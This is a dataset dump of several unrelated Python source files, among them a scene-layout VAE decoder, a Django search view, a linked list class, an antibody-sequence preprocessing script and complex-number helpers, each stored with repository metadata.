nn.Linear(hidden_size, relpos_size)\n self.mlp_relpos_13 = nn.Linear(hidden_size, relpos_size)\n self.mlp_relpos_14 = nn.Linear(hidden_size, relpos_size)\n self.mlp_relpos_15 = nn.Linear(hidden_size, relpos_size)\n self.tanh = nn.Tanh()\n\n def forward(self, parent_feature):\n vector = self.mlp(parent_feature)\n vector = self.tanh(vector)\n rc1 = self.mlp_rc1(vector) \n rc1 = self.tanh(rc1)\n rc2 = self.mlp_rc2(vector)\n rc2 = self.tanh(rc2)\n relpos_12 = self.mlp_relpos_12(vector)\n relpos_12 = self.tanh(relpos_12)\n \n rc3 = self.mlp_rc3(vector)\n rc3 = self.tanh(rc3)\n relpos_13 = self.mlp_relpos_13(vector)\n relpos_13 = self.tanh(relpos_13)\n \n rc4 = self.mlp_rc4(vector)\n rc4 = self.tanh(rc4)\n relpos_14 = self.mlp_relpos_14(vector)\n relpos_14 = self.tanh(relpos_14)\n \n rc5 = self.mlp_rc5(vector)\n rc5 = self.tanh(rc5)\n relpos_15 = self.mlp_relpos_15(vector)\n relpos_15 = self.tanh(relpos_15)\n \n return rc1,rc2,relpos_12,rc3,relpos_13,rc4,relpos_14,rc5,relpos_15#,w3,r13,w4,r14\n\n\nclass WallDecoder(nn.Module):\n u\"\"\" Decode an input (parent) feature into a left-child, left rel_pos. right_child and a right rel_pos feature \"\"\"\n def __init__(self, feature_size,relpos_size, hidden_size):\n super(WallDecoder, self).__init__()\n self.mlp = nn.Linear(feature_size, hidden_size)\n self.mlp_left = nn.Linear(hidden_size, feature_size)\n self.mlp_right = nn.Linear(hidden_size, feature_size)\n self.mlp_rightpos = nn.Linear(hidden_size, relpos_size)\n self.tanh = nn.Tanh()\n\n def forward(self, parent_feature):\n vector = self.mlp(parent_feature)\n vector = self.tanh(vector)\n left_code = self.mlp_left(vector) \n left_code = self.tanh(left_code)\n right_code = self.mlp_right(vector)\n right_code = self.tanh(right_code)\n right_pos = self.mlp_rightpos(vector)\n right_pos = self.tanh(right_pos)\n return left_code, right_code, right_pos\n\n\n\nclass BoxDecoder(nn.Module):\n\n def __init__(self, feature_size, box_size):\n super(BoxDecoder, self).__init__()\n self.mlp = nn.Linear(feature_size, box_size)\n self.tanh = nn.Tanh()\n\n def forward(self, parent_feature):\n vector = self.mlp(parent_feature)\n vector = self.tanh(vector)\n return vector\n \nclass GRAINSDecoder(nn.Module):\n def __init__(self, config):\n super(GRAINSDecoder, self).__init__()\n self.box_decoder = BoxDecoder(feature_size = config.feature_size, box_size = config.box_code_size)\n self.supp_decoder = SuppDecoder(feature_size = config.feature_size, relpos_size = config.relpos_size, hidden_size = config.hidden_size)\n self.cooc_decoder = CoocDecoder(feature_size = config.feature_size, relpos_size = config.relpos_size, hidden_size = config.hidden_size)\n self.srnd_decoder = SrndDecoder(feature_size = config.feature_size, relpos_size = config.relpos_size, hidden_size = config.hidden_size)\n self.r5_decoder = R5Decoder(feature_size = config.feature_size, feature_size2 = config.feature_size2, relpos_size = config.relpos_size, hidden_size = config.hidden_size2)\n self.wall_decoder = WallDecoder(feature_size = config.feature_size, relpos_size = config.relpos_size, hidden_size = config.hidden_size)\n self.sample_decoder = SampleDecoder(feature_size = config.feature_size2, hidden_size = config.hidden_size)\n self.node_classifier = NodeClassifier(feature_size = config.feature_size, hidden_size = config.hidden_size)\n self.mseLoss = nn.MSELoss() \n self.creLoss = nn.CrossEntropyLoss() \n \n def boxDecoder(self, feature):\n return self.box_decoder(feature)\n\n def SuppDecoder(self, feature):\n return self.supp_decoder(feature)\n\n def CoocDecoder(self, feature):\n return self.cooc_decoder(feature)\n\n def SrndDecoder(self, feature):\n return self.srnd_decoder(feature)\n \n def R5Decoder(self,feature):\n return self.r5_decoder(feature)\n \n def WallDecoder(self,feature):\n return self.wall_decoder(feature)\n \n def sampleDecoder(self, feature):\n return self.sample_decoder(feature)\n \n def nodeClassifier(self, feature):\n return self.node_classifier(feature)\n\n def boxLossEstimator(self, box_feature, gt_box_feature): #gt_box_feature is the ground truth for the box feature\n return torch.cat([self.mseLoss(b, gt).mul(0.5) for b, gt in izip(box_feature, gt_box_feature)], 0)\n \n def relposLossEstimator(self, relpos_feature, gt_relpos_feature): #gt_relpos_feature is the ground truth for the relpos feature\n return torch.cat([self.mseLoss(r, gt).mul(0.5) for r, gt in izip(relpos_feature, gt_relpos_feature)], 0)\n\n def classifyLossEstimator(self, label_vector, gt_label_vector):\n return torch.cat([self.creLoss(l.unsqueeze(0), gt).mul(0.5) for l, gt in izip(label_vector, gt_label_vector)], 0)\n\n def vectorAdder(self, v1, v2):\n return v1.add_(v2)\n \ndef decode_structure_fold(fold, tree, feature):\n \n def decode_node_box(node, feature):\n \n if node.is_leaf():\n box = fold.add(u'boxDecoder', feature)\n recon_loss = fold.add(u'boxLossEstimator', box, node.box)\n label = fold.add(u'nodeClassifier', feature)\n label_loss = fold.add(u'classifyLossEstimator', label, node.label)\n return fold.add(u'vectorAdder', recon_loss, label_loss)\n \n elif node.is_supp():\n left, right,relpos_right = fold.add(u'SuppDecoder', feature).split(3)\n left_loss = decode_node_box(node.left, left)\n right_loss = decode_node_box(node.right, right)\n right_relpos_loss = fold.add(u'relposLossEstimator', relpos_right, node.relpos_right)\n label = fold.add(u'nodeClassifier', feature)\n label_loss = fold.add(u'classifyLossEstimator', label, node.label)\n right_loss = fold.add(u'vectorAdder', right_loss, right_relpos_loss)\n loss = fold.add(u'vectorAdder', left_loss, right_loss)\n return fold.add(u'vectorAdder', loss, label_loss)\n \n elif node.is_cooc():\n left, right,relpos_right = fold.add(u'CoocDecoder', feature).split(3)\n left_loss = decode_node_box(node.left, left)\n right_loss = decode_node_box(node.right, right)\n right_relpos_loss = fold.add(u'relposLossEstimator', relpos_right, node.relpos_right)\n label = fold.add(u'nodeClassifier', feature)\n label_loss = fold.add(u'classifyLossEstimator', label, node.label)\n right_loss = fold.add(u'vectorAdder', right_loss, right_relpos_loss)\n loss = fold.add(u'vectorAdder', left_loss, right_loss)\n return fold.add(u'vectorAdder', loss, label_loss)\n \n elif node.is_srnd():\n left, center,relpos_center, right,relpos_right = fold.add(u'SrndDecoder', feature).split(5)\n left_loss = decode_node_box(node.left,left)\n center_loss = decode_node_box(node.center, center)\n center_relpos_loss = fold.add(u'relposLossEstimator', relpos_center, node.relpos_center)\n right_loss = decode_node_box(node.right, right)\n right_relpos_loss = fold.add(u'relposLossEstimator', relpos_right, node.relpos_right)\n label = fold.add('nodeClassifier', feature)\n label_loss = fold.add('classifyLossEstimator', label, node.label)\n center_loss = fold.add('vectorAdder', center_loss, center_relpos_loss)\n right_loss = fold.add('vectorAdder', right_loss, right_relpos_loss)\n loss = fold.add('vectorAdder', left_loss, center_loss)\n loss = fold.add('vectorAdder', loss, right_loss)\n return fold.add('vectorAdder', loss, label_loss) \n \n elif node.is_wall():\n left, right,relpos_right = fold.add(u'WallDecoder', feature).split(3)\n left_loss = decode_node_box(node.left, left)\n right_loss = decode_node_box(node.right, right)\n right_relpos_loss = fold.add(u'relposLossEstimator', relpos_right, node.relpos_right)\n label = fold.add(u'nodeClassifier', feature)\n label_loss = fold.add(u'classifyLossEstimator', label, node.label-1)\n right_loss = fold.add(u'vectorAdder', right_loss, right_relpos_loss)\n loss = fold.add(u'vectorAdder', left_loss, right_loss)\n return fold.add(u'vectorAdder', loss, label_loss)\n \n \n feature = fold.add(u'sampleDecoder', feature) \n node = tree.root\n rc1,rc2,relpos_12,rc3,relpos_13,rc4,relpos_14,rc5,relpos_15 = fold.add(u'R5Decoder',feature).split(9)\n rc1_loss = decode_node_box(node.left,rc1)\n rc2_loss = decode_node_box(node.center,rc2)\n relpos_12_loss = fold.add(u'relposLossEstimator', relpos_12, node.relpos_center)\n rc2_loss = fold.add('vectorAdder',rc2_loss, relpos_12_loss)\n \n rc3_loss = decode_node_box(node.right,rc3)\n relpos_13_loss = fold.add(u'relposLossEstimator', relpos_13, node.relpos_right)\n rc3_loss = fold.add('vectorAdder',rc3_loss, relpos_13_loss)\n \n rc4_loss = decode_node_box(node.root4, rc4)\n relpos_14_loss = fold.add(u'relposLossEstimator', relpos_14, node.relpos3)\n rc4_loss = fold.add('vectorAdder',rc4_loss, relpos_14_loss)\n \n rc5_loss = decode_node_box(node.root5, rc5)\n relpos_15_loss = fold.add(u'relposLossEstimator', relpos_15, node.relpos4)\n rc5_loss = fold.add('vectorAdder',rc5_loss, relpos_15_loss)\n w12_loss = fold.add('vectorAdder',rc1_loss, rc2_loss)\n w13_loss = fold.add('vectorAdder',w12_loss, rc3_loss)\n w14_loss = fold.add('vectorAdder',w13_loss, rc4_loss)\n w15_loss = fold.add('vectorAdder',w14_loss, rc5_loss)\n return w15_loss\n\n#########################################################################################\n## Functions for model testing: Decode a root code into a tree structure of boxes\n#########################################################################################\ndef vrrotvec2mat(rotvector):\n s = math.sin(rotvector[3])\n c = math.cos(rotvector[3])\n t = 1 - c\n x = rotvector[0]\n y = rotvector[1]\n z = rotvector[2]\n m = torch.FloatTensor([[t*x*x+c, t*x*y-s*z, t*x*z+s*y], [t*x*y+s*z, t*y*y+c, t*y*z-s*x], [t*x*z-s*y, t*y*z+s*x, t*z*z+c]]).cuda()\n return m\n\ndef decode_structure(model, feature):\n decode = model.sampleDecoder(feature)\n nodecount = 1;\n stack = []\n rplist = []\n boxes = []\n kids = []\n attachs = []\n \n rc1,rc2,relpos_12,rc3,relpos_13,rc4,relpos_14,rc5,relpos_15 = model.R5Decoder(decode)\n stack.append(rc1)\n stack.append(rc2)\n rplist.extend(relpos_12)\n stack.append(rc3)\n rplist.extend(relpos_13)\n stack.append(rc4)\n rplist.extend(relpos_14)\n stack.append(rc5)\n rplist.extend(relpos_15)\n kids.append([4,nodecount+1,nodecount+2,nodecount+3,nodecount+4,nodecount+5])\n nodecount = nodecount+5\n \n while len(stack) > 0:\n f = stack[0]\n stack = stack[1:]\n \n label_prob = model.nodeClassifier(f)\n _, label = torch.max(label_prob, 1)\n label = label.data # classify\n \n if label[0] == 1:\n #print u\"support node.\"\n left, right,relpos_right = model.SuppDecoder(f)\n stack.append(left)\n stack.append(right)\n kids.append([1,nodecount+1,nodecount+2,0,0,0]) \n nodecount = nodecount+2\n rplist.extend(relpos_right)\n if label[0] == 2:\n #print u\"group node.\"\n left, right,relpos_right = model.CoocDecoder(f)\n stack.append(left)\n stack.append(right)\n kids.append([2,nodecount+1,nodecount+2,0,0,0])\n nodecount = nodecount+2\n rplist.extend(relpos_right) \n if label[0] == 3:\n #print u\"surround node.\"\n left, center,relpos_center, right, relpos_right = model.SrndDecoder(f)\n stack.append(left)\n stack.append(center)\n rplist.extend(relpos_center)\n stack.append(right)\n kids.append([3,nodecount+1,nodecount+2,nodecount+3,0,0])\n nodecount = nodecount+3\n rplist.extend(relpos_right)\n \n if label[0] == 4:\n #print u\"wall node.\"\n rc1,rc2,relpos_12 = model.WallDecoder(f)\n stack.append(rc1)\n stack.append(rc2)\n rplist.extend(relpos_12)\n kids.append([5,nodecount+1,nodecount+2,0,0,0])\n nodecount = nodecount+2 \n \n if label[0] == 0:\n #print u\"box node.\"\n reBox = model.boxDecoder(f)\n bo = reBox.data.cpu().numpy()\n la = bo[0]\n la = la[3:];\n #print u\"label:\",la.argmax()\n boxes.extend(reBox)\n kids.append([0,0,0,0,0,0])\n \n #print u\"Kids are....\", kids\n return boxes, rplist, kids","sub_path":"4-training/grainsmodel_vae.py","file_name":"grainsmodel_vae.py","file_ext":"py","file_size_in_byte":28248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"121972955","text":"__author__ = 'hadu01'\n\nfrom keyframe_constraint_base import KeyframeConstraintBase\nimport numpy as np\nfrom .....external.transformations import euler_matrix, \\\n quaternion_matrix\nLEN_ROOT_POSITION = 3\nLEN_QUAT = 4\n\n\nclass JointRotationConstraint(KeyframeConstraintBase):\n def __init__(self, skeleton, constraint_desc, precision, weight_factor=1.0):\n super(JointRotationConstraint, self).__init__(constraint_desc,\n precision,\n weight_factor)\n self.skeleton = skeleton\n self.joint_name = constraint_desc['joint_name']\n self.rotation_type = constraint_desc['rotation_type']\n self.rotation_constraint = constraint_desc['rotation_constraint']\n self.frame_idx = constraint_desc['frame_index']\n if self.rotation_type == \"euler\":\n rad_angles = map(np.deg2rad, self.rotation_constraint)\n self.constraint_rotmat = euler_matrix(rad_angles[0],\n rad_angles[1],\n rad_angles[2],\n axes='rxyz')\n elif self.rotation_type == \"quaternion\":\n quat = np.asarray(self.rotation_constraint)\n quat /= np.linalg.norm(quat)\n self.constraint_rotmat = quaternion_matrix(quat)\n else:\n raise ValueError('Unknown rotation type!')\n\n def evaluate_motion_sample(self, aligned_quat_frames):\n \"\"\"\n Extract the rotation angle of given joint at certain frame, to compare with\n constrained rotation matrix\n\n \"\"\"\n joint_idx = self.skeleton.node_name_frame_map.keys().index(self.joint_name)\n quat_value = aligned_quat_frames[self.frame_idx][LEN_ROOT_POSITION + joint_idx*LEN_QUAT :\n LEN_ROOT_POSITION + (joint_idx + 1) * LEN_QUAT]\n quat_value = np.asarray(quat_value)\n quat_value /= np.linalg.norm(quat_value)\n rotmat = quaternion_matrix(quat_value)\n diff_mat = self.constraint_rotmat - rotmat\n tmp = np.ravel(diff_mat)\n error = np.linalg.norm(tmp)\n return error\n","sub_path":"python_src/morphablegraphs/motion_generator/constraints/spatial_constraints/keyframe_constraints/joint_rotation_constraint.py","file_name":"joint_rotation_constraint.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"7631505","text":"import threading\nimport time\nimport backdbcheck\nimport sys\n\n\n\nclass dbcheckc(threading.Thread):\n def __init__(self, threadID, name, counter):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.counter = counter\n def run(self):\n print(\"Background thread initialized\")\n lastchecktime = time.time()-86400\n try:\n while(True):\n if((time.time()-lastchecktime)>=86400): #checking if a day had passed\n lastchecktime=time.time()\n backdbcheck.backdbcheck()\n\n except KeyboardInterrupt:\n sys.exit(0)\n","sub_path":"dbcheck.py","file_name":"dbcheck.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"606275234","text":"file1 = open (\"doc.txt\", \"w\")\r\nL = [\"Hello I am a file \\n\",\"Where you need to return the data string \\n\",\"Which is of even length \\n\"]\r\nfile1.writelines(L)\r\nfile1.close()\r\nfile1 = open(\"doc.txt\", \"r+\")\r\ntext = file1.readlines()\r\nwords = []\r\nfor line in text:\r\n words += line.split(\" \")\r\n words.remove(\"\\n\")\r\neven_len_string = []\r\nfor i in words:\r\n if len(i) % 2 == 0:\r\n even_len_string.append(i)\r\n# print(even_len_string)\r\nlistToStr = ' '.join([str(elem) for elem in even_len_string])\r\n# print(listToStr)\r\nfile1.close()\r\nwith open(\"doc.txt\", \"a\") as document1:\r\n f = [\"Even length string is : \\n\",listToStr]\r\n document1.writelines(f)","sub_path":"Task5/ques6.py","file_name":"ques6.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"255870839","text":"import matplotlib.pylab as plt\r\n\r\nnum_range = int(input(\"Enter number range 1..N : \"))\r\npower = int(input(\"Enter power N^x : \" ))\r\n\r\nx_values = list(range(1, num_range + 1))\r\ny_values = [x**power for x in x_values]\r\n\r\nplt.scatter(x_values, y_values, c=y_values, cmap=plt.cm.Blues, \r\n edgecolor='none', s=40)\r\n\r\n# Set range for each axis\r\nplt.axis([0, num_range + 2, 0, (num_range + 2) ** power])\r\n\r\n# Set chart title and label axis.\r\nplt.title(\"Square Numbers\", fontsize=24)\r\nplt.xlabel(\"Value\", fontsize=14)\r\nplt.ylabel(\"Square of Value\", fontsize=14)\r\n\r\n# Set size of tick labels.\r\nplt.tick_params(axis='both', which='major', labelsize=14)\r\n\r\nplt.show()","sub_path":"Data_Visualization/scatter_squares.py","file_name":"scatter_squares.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"476634828","text":"import numpy as np\nfrom collections import defaultdict\nimport formatter\nimport sys\n\nclass DepletingPool:\n def __init__(self, i, known_peers, log):\n self.hist_explored_peers = {} # key is peer, value is the last time in mc table\n self.counter = 0\n self.id = i\n self.known_peers = set(known_peers)\n self.log = log\n self.dead_loop_breaker = 0\n\n def get_exploring_peers(self, curr_peers, keep_peers, num_explore, oracle, curr_out):\n self.dead_loop_breaker += 1\n if self.dead_loop_breaker > 2:\n print('called get_exploring_peers more than 2. Cannot explore new peers even in a whole pool. Choose ranom non-outgoin peer to explore', self.dead_loop_breaker)\n cands = self.known_peers.difference(curr_out)\n explores = list(np.random.choice(list(cands), num_explore, replace=False))\n return [int(i) for i in explores]\n\n # sys.exit(1)\n for p in curr_peers + keep_peers:\n self.hist_explored_peers[p] = self.counter\n pools = self.known_peers\n cands = list(pools.difference(self.hist_explored_peers.keys()))\n # print(self.counter, 'seen', len(self.hist_explored_peers), ' peers', sorted(list(self.hist_explored_peers.keys())))\n if len(cands) >= num_explore:\n explores = []\n np.random.shuffle(cands)\n for i in cands:\n if len(oracle.can_i_connect(self.id, [i])) == 0:\n explores.append(i)\n if num_explore == len(explores):\n break\n\n if num_explore == len(explores):\n # explores = list(np.random.choice(list(cands), num_explore, replace=False))\n formatter.printt('\\t\\tExplore(deplet full):\\t\\t{}\\n'.format(sorted(explores)), self.log)\n self.counter += 1\n self.dead_loop_breaker = 0\n return explores\n else:\n num_explore -= len(explores)\n self.hist_explored_peers.clear()\n new_pool_explore = self.get_exploring_peers(curr_peers, keep_peers, num_explore, oracle, curr_out)\n formatter.printt('\\t\\tExplore(deplet insu oracle):\\t\\t{}\\n'.format(sorted(explores+new_pool_explore)),self.log)\n self.counter += 1\n self.dead_loop_breaker = 0\n return explores + new_pool_explore\n\n else:\n explores = []\n for i in cands:\n if len(oracle.can_i_connect(self.id, [i])) == 0:\n explores.append(i)\n if num_explore == len(explores):\n break\n\n num_explore -= len(cands)\n self.hist_explored_peers.clear()\n new_pool_explore = self.get_exploring_peers(curr_peers, keep_peers, num_explore, oracle, curr_out)\n # print('\\t\\tExplore(deplet):\\t\\t'+str(sorted(explores+new_pool_explore)))\n formatter.printt('\\t\\tExplore(deplet insu cand):\\t\\t{}\\n'.format(sorted(explores+new_pool_explore)),self.log)\n self.counter += 1\n self.dead_loop_breaker = 0\n return explores + new_pool_explore\n\nclass RandomExplorer:\n def __init__(self, i, known_peers, log):\n self.id = i\n self.known_peers = set(known_peers)\n self.log = log\n\n def get_exploring_peers(self, curr_peers, keep_peers, num_explore, oracle):\n pools = self.known_peers\n cands = list(pools.difference(curr_peers))\n explores = []\n for i in np.random.permutation(cands):\n if len(oracle.can_i_connect(self.id, [i])) == 0:\n explores.append(i)\n if num_explore == len(explores):\n break\n if num_explore != len(explores):\n print('cannot find sufficient random nodes')\n sys.exit(1)\n return explores\n\n\nclass GreedyExplorer:\n def __init__(self, node_id):\n self.subset_record = defaultdict(dict) # key is subset, value is covered peered thourgh me whose value is count\n self.peer_record = {} # contributor who gives good record\n self.id = node_id\n\n def select_comparison(self):\n pass\n\n def get_exploring_peers(self, H, nodes, plus_mask, curr_peers, keep_peers, num_explore):\n pass\n","sub_path":"core/explorer.py","file_name":"explorer.py","file_ext":"py","file_size_in_byte":4304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"216646813","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 24 09:14:43 2021\n\n@author: magoncal\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom glob import glob\nimport random\n\nfrom Bio import SeqIO\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\n\n#data = pd.concat([pd.read_csv(file , header=1) for file in glob('csv/*/*')])\n#data.to_csv('antibody_pairing.csv', index=False)\ndata = pd.read_csv('antibody_pairing.csv').reset_index()\ndata['index'] = \"paired_\"+data['index'].astype(str)\n\n# Generating short sample to test the model with anarci alignment\nrandom.seed(12345)\nclass_ids = random.sample(range(0, len(data)), 100)\n\ndata_heavy = data.loc[class_ids, ['index', 'sequence_alignment_aa_heavy']].values.tolist()\ndata_light = data.loc[class_ids, ['index', 'sequence_alignment_aa_light']].values.tolist()\n\nheavy_lst = []\ni=1\nfor item in data_heavy:\n heavy_lst.append(SeqRecord(Seq(item[1]), id=str(item[0]), name=str(item[0]), description=\"\"))\n if i%50==0 and i>0:\n with open('heavy_chain_'+str(i)+'.fasta', 'w') as handle:\n SeqIO.write(heavy_lst, handle, \"fasta\")\n heavy_lst = []\n i+=1\n\nlight_lst = []\ni=1\nfor item in data_light:\n light_lst.append(SeqRecord(Seq(item[1]), id=str(item[0]), name=str(item[0]), description=\"\"))\n if i%50==0 and i>0:\n with open('light_chain_'+str(i)+'.fasta', 'w') as handle:\n SeqIO.write(light_lst, handle, \"fasta\")\n light_lst = []\n i+=1\n \n#Loading anarci data\nanarci_heavy = pd.concat([pd.read_csv(file) for file in glob('anarci/*heavy*')])\nanarci_light = pd.concat([pd.read_csv(file) for file in glob('anarci/*light*')])\n\ncols = [\"Id\"]+list(anarci_heavy.columns)[-145:]\nanarci_heavy = anarci_heavy.loc[:, cols]\nfor category in cols[1:]:\n anarci_heavy[category] = anarci_heavy[category].astype('category')\n\ncols = [\"Id\"]+list(anarci_light.columns)[-127:]\nanarci_light = anarci_light.loc[:, cols]\nfor category in cols[1:]:\n anarci_light[category] = anarci_light[category].astype('category')\n\ndata_filter = np.merge()","sub_path":"src/pre_processing.py","file_name":"pre_processing.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"169632715","text":"class Solution:\n def fullJustify(self, words: List[str], max_width: int) -> List[str]:\n # let M be number of words and K be max_width\n # Time: O(MK); Space: O(K)\n # if K << M, time: O(M); space: O(1)\n # \n lines = []\n start, end = 0, 1\n \n # O(M)\n while True:\n # Construct a line\n count = len(words[start])\n while count < max_width and end < len(words):\n count += (1 + len(words[end]))\n end += 1\n \n if count > max_width:\n end -= 1\n count -= (1 + len(words[end]))\n \n extra_spaces = max_width - count\n \n # Last line\n if end == len(words):\n lines.append(' '.join(words[start: end]) + ' ' * extra_spaces)\n break\n \n # Last - 1 line\n n_spaces = end - start - 1\n left, add_spaces = (extra_spaces % n_spaces, \n extra_spaces // n_spaces) if n_spaces else (0, extra_spaces)\n tmp = words[start]\n # Edge case, if we can only fit one word in a line\n if not n_spaces:\n tmp += ' ' * add_spaces\n for i in range(start + 1, end):\n if left:\n tmp += ' ' * (1 + add_spaces + 1) + words[i]\n left -= 1\n else:\n tmp += ' ' * (1 + add_spaces) + words[i]\n lines.append(tmp)\n \n start, end = end, end + 1\n return lines\n ","sub_path":"leetcode/lc68_Text_Justification.py","file_name":"lc68_Text_Justification.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"18313032","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.shortcuts import render_to_response\nfrom books.models import Book\n\n# We don't need this anymore\ndef search_form(request):\n return render_to_response('search_form.html')\n\ndef search(request):\n errors = []\n if 'q' in request.GET:\n q = request.GET['q']\n if not q:\n errors.append('Please enter a search term')\n elif len(q) > 20:\n errors.append('The search term should be less than 20 characters')\n else:\n books = Book.objects.filter(title__icontains = q)\n return render_to_response('search_results.html', {'books': books, 'query': q})\n \n return render_to_response('search_form.html', {'errors': errors})","sub_path":"mysite/books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"575844969","text":"from TeobaldoGames import app\nfrom flask import render_template, flash, redirect\nfrom .forms import LoginForm\n\n@app.route('/')\n@app.route('/home')\ndef home():\n return render_template('home.html', title='Home - TeobaldoGames')\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n\tform = LoginForm()\n\tif form.validate_on_submit():\n\t\tflash('Login sucessu.')\n\t\treturn redirect('/home')\n\treturn render_template('login.html', \n\t\t\t\t\t\t\ttitle='Sign In',\n\t\t\t\t\t\t\tform = form)","sub_path":"TeobaldoGames/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"109628880","text":"def char_range(char_a, char_b):\n start = ord(char_a)\n end = ord(char_b)\n\n for i in range(start + 1, end):\n if i != end-1:\n print(chr(i), end=\" \")\n else:\n print(chr(i))\n\n\nletter_one = input()\nletter_two = input()\nchar_range(letter_one, letter_two)\n","sub_path":"03. Functions/03. Characters in Range.py","file_name":"03. Characters in Range.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"252697531","text":"# -*- coding:utf8 -*-\n\nimport time\nfrom appium import webdriver\n\ndesired_caps = {}\ndesired_caps['platformName'] = 'Android'\ndesired_caps['platformVersion'] = '7.0'\ndesired_caps['deviceName'] = 'emulator-5554'\ndesired_caps['appPackage'] = 'com.google.android.youtube'\ndesired_caps['appActivity'] = '.app.honeycomb.Shell$HomeActivity'\ndesired_caps['newCommandTimeout'] = '1000'\ndesired_caps['noReset'] = True\n\n\ndriver = webdriver.Remote('http://0.0.0.0:4723/wd/hub', desired_caps)\ntime.sleep(10)\n\n# home page\nel = driver.find_element_by_accessibility_id(\"Impossible Challenge S2 20161218 Basketball Shooting & Brain Wave Control | CCTV - 1 hour, 37 minutes - Go to channel - CCTV中国中央电视台 - 1.5M views - 4 years ago - play video\")\nel.click()\n\ndriver.quit()\n\n\n'''\n{\n \"platformName\": \"Android\",\n \"platformVersion\": \"10\",\n \"deviceName\": \"emulator-5554\",\n \"noReset\": true,\n \"appPackage\": \"com.google.android.youtube\",\n \"appActivity\": \".app.honeycomb.Shell$HomeActivity\"\n}\n'''","sub_path":"ApkTestScript/youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"10648903","text":"''' Singly Linked List\nAccess - Θ(n), O(n)\nSearch - Θ(n), O(n)\nInsertion - Θ(1), O(1)\nDeletion - Θ(1), O(1)\n'''\nclass SinglyLinkedList:\n def __init__(self, head_data = None):\n self.head = self.SLLNode(head_data) if head_data is not None else None\n\n def access(self, position):\n curr = self.head\n i = 0\n while curr and i < position:\n curr = curr.next\n i += 1\n if curr:\n return curr\n else:\n raise IndexError('SLL index out of bounds.')\n\n def search(self, value):\n curr, i = self.head, 0\n while curr:\n if curr.data == value:\n return i\n curr, i = curr.next, i + 1\n return -1 # does not exist\n\n def insert(self, value, position=-1):\n position = self.__len__() if position == -1 else position\n if position > self.__len__() or position < 0:\n raise IndexError('Position index out of bounds.')\n to_insert = self.SLLNode(value)\n\n if position == 0:\n to_insert.next = self.head\n self.head = to_insert\n else:\n prevNode = self.access(position-1)\n nextNode = prevNode.next\n prevNode.next = to_insert\n to_insert.next = nextNode\n\n def delete(self, position):\n if position >= self.__len__() or position < 0:\n raise IndexError('Position index out of bounds.')\n \n if position == 0:\n if self.head:\n self.head = self.head.next\n else:\n prevNode = self.access(position-1)\n nextNode = prevNode.next.next\n prevNode.next = nextNode\n\n def to_list(self):\n output = []\n curr = self.head\n while curr:\n output.append(curr.data)\n curr = curr.next\n return output\n\n def __getitem__(self, key):\n sz = self.__len__()\n if key < 0:\n key = sz + key\n if key > sz or key < 0:\n raise IndexError('List index out of range.')\n return self.access(key).data\n\n def __repr__(self):\n return str(self.to_list())\n\n def __len__(self):\n return len(self.to_list())\n\n class SLLNode:\n def __init__(self, data):\n self.data = data\n self.next = None","sub_path":"InterviewPrep/datastructures/SinglyLinkedList.py","file_name":"SinglyLinkedList.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"634659090","text":"import math\n\n\ndef suma(num1, num2):\n suma1 =num1[0] + num2[0]\n suma2 =num1[1] + num2[1]\n resultado = suma1, suma2\n return resultado\n\n\ndef resta(num1, num2):\n resta1 = round(num1[0] - num2[0], 3)\n resta2 = round(num1[1] - num2[1], 3)\n resultado = resta1, resta2\n return resultado\n\n\ndef multi(num1, num2):\n rest1 = (num1[0] * num2[0]) - (num1[1] * num2[1])\n rest2 = (num1[0] * num2[1]) + (num1[1] * num2[0])\n resultado = rest1, rest2\n return resultado\n\n\ndef division(num1, num2):\n div1 = round(((num1[0] * num2[0]) + (num1[1] * num2[1])) / ((num2[0] ** 2) + (num2[1] ** 2)), 3)\n div2 = round(((num1[1] * num2[0]) - (num1[0] * num2[1])) / ((num2[0] ** 2) + (num2[1] ** 2)), 3)\n resultado = div1, div2\n return resultado\n\n\ndef modulo(num1):\n rta = round(((num1[0] ** 2) + (num1[1] ** 2)) ** (1 / 2), 2)\n return rta\n\n\ndef conjugado(num1):\n img = num1[1] * -1\n rta = num1[0], img\n return rta\n\n\ndef polares(num1):\n p = modulo(num1)\n theta = round(math.atan2(num1[1] , num1[0]), 3)\n resultado = p, theta\n return resultado\n\n\ndef cartesianos(num1):\n a = round(num1[0] * (math.cos(num1[1])), 3)\n b = round(num1[0] * (math.sin(num1[1])), 3)\n resultado = a, b\n return resultado\n\n\ndef fase(num1):\n fase1 = 